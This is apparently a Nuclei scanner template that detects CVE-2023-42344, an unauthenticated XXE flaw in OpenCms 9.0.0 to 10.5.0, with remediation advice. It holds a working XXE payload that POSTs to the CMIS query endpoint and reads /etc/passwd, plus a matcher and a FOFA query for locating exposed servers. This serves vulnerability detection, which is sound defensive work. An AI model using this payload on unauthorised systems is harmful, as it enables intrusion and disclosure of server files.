nuclei-templates/http/cves/2023/CVE-2023-42344.yaml

id: CVE-2023-42344

info:
  name: OpenCMS - Unauthenticated XXE
  author: 0xr2r
  severity: high
  description: |
    users can execute code without authentication. An attacker can execute malicious requests on the OpenCms server. When the requests are successful vulnerable OpenCms can be exploited resulting in an unauthenticated XXE vulnerability. Based on research OpenCMS versions from 9.0.0 to 10.5.0 are vulnerable.
  remediation: Advised to upgrade to OpenCMS 10.5.1 or later to patch the vulnerability
  reference:
    - https://blog.qualys.com/product-tech/2023/12/08/opencms-unauthenticated-xxe-vulnerability-cve-2023-42344
    - https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
  metadata:
    verified: true
    max-request: 1
    fofa-query: "OpenCms-9.5.3"
  tags: cve,cve2023,xxe,opencms

http:
  - method: POST
    path:
      - "{{BaseURL}}/opencms/cmisatom/cmis-online/query"
      - "{{BaseURL}}/cmisatom/cmis-online/query"
    headers:
      Content-Type: "application/xml;charset=UTF-8"
      Referer: "{{RootURL}}"
    body: |
      <?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><cmis:query xmlns:cmis="http://docs.oasis-open.org/ns/cmis/core/200908/"><cmis:statement>&test;</cmis:statement><cmis:searchAllVersions>false</cmis:searchAllVersions><cmis:includeAllowableActions>false</cmis:includeAllowableActions><cmis:includeRelationships>none</cmis:includeRelationships><cmis:renditionFilter>cmis:none</cmis:renditionFilter><cmis:maxItems>100</cmis:maxItems><cmis:skipCount>0</cmis:skipCount></cmis:query>
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "invalidArgument"
        condition: and
# digest: 490a0046304402207109561f9ee225ddc24e0e2428763262bbd09665f2d2e30980f46c87af7476fd02206d213db222bf432261211cadb7e9cdc0f4431ad34f41a444becca4917fa9d2ec:922c64590222798bb761d5b6d8e72950